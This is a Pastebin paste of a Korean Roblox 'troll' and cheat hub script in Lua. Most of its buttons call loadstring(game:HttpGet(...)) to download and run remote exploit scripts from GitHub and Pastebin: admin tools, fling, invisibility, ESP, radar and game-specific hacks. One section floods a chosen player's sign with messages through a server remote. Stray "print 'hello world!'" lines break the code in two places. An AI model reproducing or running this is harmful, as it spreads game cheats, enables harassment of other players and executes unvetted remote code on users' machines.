Advertisement
uoryetwq

v6

Feb 2nd, 2025
32
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 13.17 KB | None | 0 0
  1. local Rayfield = loadstring(game:HttpGet('https://sirius.menu/rayfield'))()
  2.  
  3. local Window = Rayfield:CreateWindow({
  4. Name = "๐Ÿ’€๋ฉ”๊ฐ€๊ฐœ๊ผญ์ง€์Šคํฌ๋ฆฝํŠธ๐Ÿ’€",
  5. Icon = 0, -- Icon in Topbar. Can use Lucide Icons (string) or Roblox Image (number). 0 to use no icon (default).
  6. LoadingTitle = "๋กœ๋”ฉ ์ค‘ . . .",
  7. LoadingSubtitle = "by ๊ฐœ๊ผญ์ง€๋งจ",
  8. Theme = "Default", -- Check https://docs.sirius.menu/rayfield/configuration/themes
  9.  
  10. DisableRayfieldPrompts = false,
  11. DisableBuildWarnings = false, -- Prevents Rayfield from warning when the script has a version mismatch with the interface
  12.  
  13. ConfigurationSaving = {
  14. Enabled = true,
  15. FolderName = nil, -- Create a custom folder for your hub/game
  16. FileName = "Big Hub"
  17. },
  18.  
  19. Discord = {
  20. Enabled = false, -- Prompt the user to join your Discord server if their executor supports it
  21. Invite = "noinvitelink", -- The Discord invite code, do not include discord.gg/. E.g. discord.gg/ABCD would be ABCD
  22. RememberJoins = true -- Set this to false to make them join the discord every time they load it up
  23. },
  24.  
  25. KeySystem = true, -- Set this to true to use our key system
  26. KeySettings = {
  27. Title = "๋ฉ”๊ฐ€๊ฐœ๊ผญ์ง€ํ‚ค์‹œ์Šคํ…œ",
  28. Subtitle = "youtube ๊ฐœ๊ผญ์ง€๋งจ",
  29. Note = "ํ‚ค๋Š” ์œ ํŠœ๋ธŒ์—", -- Use this to tell the user how to get a key
  30. FileName = "Key", -- It is recommended to use something unique as other scripts using Rayfield may overwrite your key file
  31. SaveKey = false, -- The user's key will be saved, but if you change the key, they will be unable to use your script
  32. GrabKeyFromSite = false, -- If this is true, set Key below to the RAW site you would like Rayfield to get the key from
  33. Key = {"happy"} -- List of keys that will be accepted by the system, can be RAW file links (pastebin, github etc) or simple strings ("hello","key22")
  34. }
  35. })
  36.  
  37. local Tab = Window:CreateTab("ํŠธ๋กค ์Šคํฌ๋ฆฝํŠธ", nil) -- Title, Image
  38. local Section = Tab:CreateSection("ํŠธ๋กค ์Šคํฌ๋ฆฝํŠธ")
  39.  
  40. Rayfield:Notify({
  41. Title = "์‹คํ–‰์™„๋ฃŒ",
  42. Content = "๋‹น๋‹นํ•˜๊ฒŒ ์”์‹œ๋‹ค",
  43. Duration = 9.5,
  44. Image = 4483362458,
  45. })
  46.  
  47. local Toggle = Tab:CreateToggle({
  48. Name = "์ธํ”ผ๋‹ˆํ‹ฐ์•ผ๋“œ",
  49. CurrentValue = false,
  50. Flag = "Toggle1", -- A flag is the identifier for the configuration file, make sure every element has a different flag if you're using configuration saving to ensure no overlaps
  51. Callback = function(Value)
  52. loadstring(game:HttpGet('https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source'))()
  53. -- The variable (Value) is a boolean on whether the toggle is true or false
  54. end,
  55. })
  56.  
  57. local Toggle = Tab:CreateToggle({
  58. Name = "ant fling",
  59. CurrentValue = false,
  60. Flag = "Toggle1", -- A flag is the identifier for the configuration file, make sure every element has a different flag if you're using configuration saving to ensure no overlaps
  61. Callback = function(Value)
  62. loadstring(game:HttpGet("https://pastebin.com/raw/Jx2MHYvF"))()
  63. -- The variable (Value) is a boolean on whether the toggle is true or false
  64. end,
  65. })
  66.  
  67. local Toggle = Tab:CreateToggle({
  68. Name = "invisible",
  69. CurrentValue = false,
  70. Flag = "Toggle1", -- A flag is the identifier for the configuration file, make sure every element has a different flag if you're using configuration saving to ensure no overlaps
  71. Callback = function(Value)
  72. loadstring(game:HttpGet('https://pastebin.com/raw/3Rnd9rHf'))()
  73. -- The variable (Value) is a boolean on whether the toggle is true or false
  74. end,
  75. })
  76.  
  77. local mainTab = Window:CreateTab("๋‚™.์ธ", nil) -- Title, Image
  78. local mainSection = mainTab:CreateSection("๐Ÿคž")
  79.  
  80. local Toggle = Tab:CreateToggle({
  81. Name = "ghost hub",
  82. CurrentValue = false,
  83. Flag = "Toggle1", -- A flag is the identifier for the configuration file, make sure every element has a different flag if you're using configuration saving to ensure no overlaps
  84. Callback = function(Value)
  85. loadstring(game:HttpGet('https://raw.githubusercontent.com/GhostPlayer352/Test4/main/GhostHub'))()
  86. -- The variable (Value) is a boolean on whether the toggle is true or false
  87. end,
  88. })
  89.  
  90. local Toggle = Tab:CreateToggle({
  91. Name = "systembroken",
  92. CurrentValue = false,
  93. Flag = "Toggle1", -- A flag is the identifier for the configuration file, make sure every element has a different flag if you're using configuration saving to ensure no overlaps
  94. Callback = function(Value)
  95. loadstring(game:HttpGet("https://raw.githubusercontent.com/H20CalibreYT/SystemBroken/main/script"))()
  96. -- The variable (Value) is a boolean on whether the toggle is true or false
  97. end,
  98. })
  99.  
  100. local Button = mainTab:CreateButton({
  101. Name = "ios hub",
  102. Callback = function()
  103. loadstring(game:HttpGet("https://raw.githubusercontent.com/QP-Community/Roblox-Exploit/main/Sirius"))()
  104. end,
  105. })
  106.  
  107. local Button = mainTab:CreateButton({
  108. Name = "ESP",
  109. Callback = function()
  110. loadstring(game:HttpGet('https://raw.githubusercontent.com/ic3w0lf22/Unnamed-ESP/master/UnnamedESP.lua',true))()
  111. end,
  112. })
  113.  
  114. local Button = mainTab:CreateButton({
  115. Name = "Radar",
  116. Callback = function()
  117. loadstring(game:HttpGet("https://pastebin.com/raw/7jv0Tnz5"))()
  118. end,
  119. })
  120.  
  121. local Button = mainTab:CreateButton({
  122. Name = "์–ด๋“œ๋ฏผ",
  123. Callback = function()
  124. loadstring(game:HttpGet("https://raw.githubusercontent.com/FilteringEnabled/NamelessAdmin/main/Source"))()
  125. end,
  126. })
  127.  
  128. local Tab = Window:CreateTab("๋ธ”ํ”ผ ์Šคํฌ๋ฆฝํŠธ", nil) -- Title, Image
  129. local Section = Tab:CreateSection("๋ธ”ํ”ผ ์Šคํฌ๋ฆฝํŠธ")
  130.  
  131. local Toggle = Tab:CreateToggle({
  132. Name = "bloxfruit",
  133. CurrentValue = false,
  134. Flag = "Toggle1", -- A flag is the identifier for the configuration file, make sure every element has a different flag if you're using configuration saving to ensure no overlaps
  135. Callback = function(Value)
  136. loadstring(game:HttpGet("https://raw.githubusercontent.com/AhmadV99/Speed-Hub-X/main/Speed%20Hub%20X.lua", true))()
  137. -- The variable (Value) is a boolean on whether the toggle is true or false
  138. end,
  139. })
  140.  
  141. local Tab = Window:CreateTab("๋ ‰ ์ค„์—ฌ์ฃผ๋Š” ์Šคํฌ๋ฆฝํŠธ", nil) -- Title, Image
  142. local Section = Tab:CreateSection("๋ ‰ ์ค„์—ฌ์ฃผ๋Š” ์Šคํฌ๋ฆฝํŠธ")
  143.  
  144. local Button = Tab:CreateButton({
  145. Name = "๊ทธ๋ž˜ํ”ฝ ์กฐ๊ธˆ ๋‚ฎ์•„์ง",
  146. Callback = function()
  147. loadstring(game:HttpGet("https://raw.githubusercontent.com/CasperFlyModz/discord.gg-rips/main/FPSBooster.lua"))()
  148. end,
  149. })print 'hello world!'
  150.  
  151. local Tab = Window:CreateTab("ํ”„๋ฆฌ์ฆŒ๋ผ์ดํ”„", nil) -- Title, Image
  152. local Section = Tab:CreateSection("ํ”„๋ฆฌ์ฆŒ๋ผ์ดํ”„")
  153.  
  154. local Button = Tab:CreateButton({
  155. Name = "ํ”„๋ฆฌ์ฆŒ๋ผ์ดํ”„",
  156. Callback = function()
  157. --[[
  158. WARNING: Heads up! This script has not been verified by ScriptBlox. Use at your own risk!
  159. ]]
  160. loadstring(game:HttpGet('https://raw.githubusercontent.com/devguy100/PrizzLife/main/Source/release_v0.8.1.lua'))()
  161. end,
  162. })
  163.  
  164. local Button = Tab:CreateButton({
  165. Name = "ํ”„๋ฆฌ์ฆŒ๋ผ์ดํ”„2",
  166. Callback = function()
  167. loadstring(game:HttpGet("https://raw.githubusercontent.com/QP-Community/Roblox-Exploit/main/TigerAdmin"))()
  168. end,
  169. })
  170.  
  171. local Tab = Window:CreateTab("๋ธ”๋ ˆ์ด๋“œ๋ณผ", nil) -- Title, Image
  172. local Section = Tab:CreateSection("๋ธ”๋ ˆ์ด๋“œ๋ณผ")
  173.  
  174. local Button = Tab:CreateButton({
  175. Name = "๋ธ”๋ ˆ์ด๋“œ๋ณผ",
  176. Callback = function()
  177. loadstring(game:HttpGet("https://raw.githubusercontent.com/PawsThePaw/Plutonium.AA/main/Plutonium.Loader.lua", true))()
  178. end,
  179. })
  180.  
  181. local Tab = Window:CreateTab("ํ‘œ์ง€ํŒ ์Šคํฌ๋ฆฝํŠธ",nil ) -- Title, Image
  182. local Section = Tab:CreateSection("ํ‘œ์ง€ํŒ ์Šคํฌ๋ฆฝํŠธ")
  183.  
  184. local Dropdown = Tab:CreateDropdown({
  185. Name = "ํด๋ฆญ !",
  186. Options = {"์ „์ฒด","ํ•œ๋ช…"},
  187. CurrentOption = {"Option 1"},
  188. MultipleOptions = false,
  189. Flag = "Dropdown1", -- A flag is the identifier for the configuration file, make sure every element has a different flag if you're using configuration saving to ensure no overlaps
  190. Callback = function(Options)
  191. loadstring(game:HttpGet('https://raw.githubusercontent.com/LKR-beta/scripts/refs/heads/main/sign-controler'))()
  192. local Players = game:GetService("Players")
  193. local UserInputService = game:GetService("UserInputService")
  194. local LocalPlayer = Players.LocalPlayer
  195. local ScreenGui = Instance.new("ScreenGui")
  196. ScreenGui.Parent = game:GetService("CoreGui")
  197.  
  198.  
  199. local nameTextBox = Instance.new("TextBox")
  200. nameTextBox.Size = UDim2.new(0, 200, 0, 40)
  201. nameTextBox.Position = UDim2.new(0.5, -100, 0.5, -70)
  202. nameTextBox.Text = ""
  203. nameTextBox.BackgroundColor3 = Color3.fromRGB(25, 25, 25)
  204. nameTextBox.BackgroundTransparency = 0.2
  205. nameTextBox.BorderSizePixel = 0
  206. nameTextBox.TextColor3 = Color3.fromRGB(255, 255, 255)
  207. nameTextBox.Font = Enum.Font.GothamBold
  208. nameTextBox.PlaceholderText = "์ด๋ฆ„์„ ์ž…๋ ฅํ•˜์„ธ์š”"
  209. nameTextBox.TextXAlignment = Enum.TextXAlignment.Center
  210. nameTextBox.TextYAlignment = Enum.TextYAlignment.Center
  211. nameTextBox.Parent = ScreenGui
  212.  
  213.  
  214. local messageTextBox = Instance.new("TextBox")
  215. messageTextBox.Size = UDim2.new(0, 200, 0, 40)
  216. messageTextBox.Position = UDim2.new(0.5, -100, 0.5, -20)
  217. messageTextBox.Text = ""
  218. messageTextBox.BackgroundColor3 = Color3.fromRGB(25, 25, 25)
  219. messageTextBox.BackgroundTransparency = 0.2
  220. messageTextBox.BorderSizePixel = 0
  221. messageTextBox.TextColor3 = Color3.fromRGB(255, 0, 0)
  222. messageTextBox.Font = Enum.Font.GothamBold
  223. messageTextBox.PlaceholderText = "๋ฉ”์‹œ์ง€๋ฅผ ์ž…๋ ฅํ•˜์„ธ์š”"
  224. messageTextBox.TextXAlignment = Enum.TextXAlignment.Center
  225. messageTextBox.TextYAlignment = Enum.TextYAlignment.Center
  226. messageTextBox.Parent = ScreenGui
  227.  
  228. local function sendEffectToPlayer(effectMessage)
  229. local targetPlayerName = nameTextBox.Text
  230. for _, player in pairs(Players:GetPlayers()) do
  231. if player.Name == targetPlayerName then
  232. pcall(function()
  233. local character = player.Character
  234. if character then
  235. local updateSign = character:FindFirstChild("UpdateSign", true)
  236. if updateSign then
  237. updateSign:FireServer(effectMessage)
  238. end
  239. end
  240. end)
  241. end
  242. end
  243. end
  244.  
  245. local currentText = ""
  246. local heartbeatConnection
  247.  
  248. local function updateHeartbeat()
  249. if heartbeatConnection then heartbeatConnection:Disconnect() end
  250. heartbeatConnection = game:GetService("RunService").Heartbeat:Connect(function()
  251. if currentText ~= "" then
  252. sendEffectToPlayer(currentText)
  253. end
  254. end)
  255. end
  256.  
  257. messageTextBox:GetPropertyChangedSignal("Text"):Connect(function()
  258. local newText = messageTextBox.Text
  259. if newText ~= currentText then
  260. currentText = newText
  261.  
  262. local sound = Instance.new("Sound")
  263. sound.SoundId = "rbxassetid://7293306821"
  264. sound.Parent = messageTextBox.Parent
  265. sound:Play()
  266. sound.Ended:Connect(function()
  267. sound:Destroy()
  268. end)
  269.  
  270. updateHeartbeat()
  271. end
  272. end)
  273.  
  274.  
  275. local dragging = false
  276. local dragStart = nil
  277. local startPos = nil
  278.  
  279.  
  280. nameTextBox.InputBegan:Connect(function(input)
  281. if input.UserInputType == Enum.UserInputType.MouseButton1 then
  282. dragging = true
  283. dragStart = input.Position
  284. startPos = nameTextBox.Position
  285.  
  286. input.Changed:Connect(function()
  287. if input.UserInputState == Enum.UserInputState.End then
  288. dragging = false
  289. end
  290. end)
  291. end
  292. end)
  293.  
  294. UserInputService.InputChanged:Connect(function(input)
  295. if dragging and input.UserInputType == Enum.UserInputType.MouseMovement then
  296. local delta = input.Position - dragStart
  297. nameTextBox.Position = UDim2.new(startPos.X.Scale, startPos.X.Offset + delta.X, startPos.Y.Scale, startPos.Y.Offset + delta.Y)
  298. end
  299. end)
  300.  
  301.  
  302. messageTextBox.InputBegan:Connect(function(input)
  303. if input.UserInputType == Enum.UserInputType.MouseButton1 then
  304. dragging = true
  305. dragStart = input.Position
  306. startPos = messageTextBox.Position
  307.  
  308. input.Changed:Connect(function()
  309. if input.UserInputState == Enum.UserInputState.End then
  310. dragging = false
  311. end
  312. end)
  313. end
  314. end)
  315.  
  316. UserInputService.InputChanged:Connect(function(input)
  317. if dragging and input.UserInputType == Enum.UserInputType.MouseMovement then
  318. local delta = input.Position - dragStart
  319. messageTextBox.Position = UDim2.new(startPos.X.Scale, startPos.X.Offset + delta.X, startPos.Y.Scale, startPos.Y.Offset + delta.Y)
  320. end
  321. end)
  322. end,
  323. })print 'hello world!'
  324.  
  325. local mainTab = Window:CreateTab("์‚ด๋ณด๊ฒฐ", nil) -- Title, Image
  326. local mainSection = mainTab:CreateSection("!")
  327.  
  328. local Toggle = Tab:CreateToggle({
  329. Name = "ํด๋ฆญ",
  330. CurrentValue = false,
  331. Flag = "Toggle1", -- A flag is the identifier for the configuration file, make sure every element has a different flag if you're using configuration saving to ensure no overlaps
  332. Callback = function(Value)
  333. _G.Circlepartsblock = 125
  334. loadstring(game:HttpGet("https://raw.githubusercontent.com/zk0o/function-table-return/refs/heads/main/end"))()
  335. -- The variable (Value) is a boolean on whether the toggle is true or false
  336. end,
  337. })
  338.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement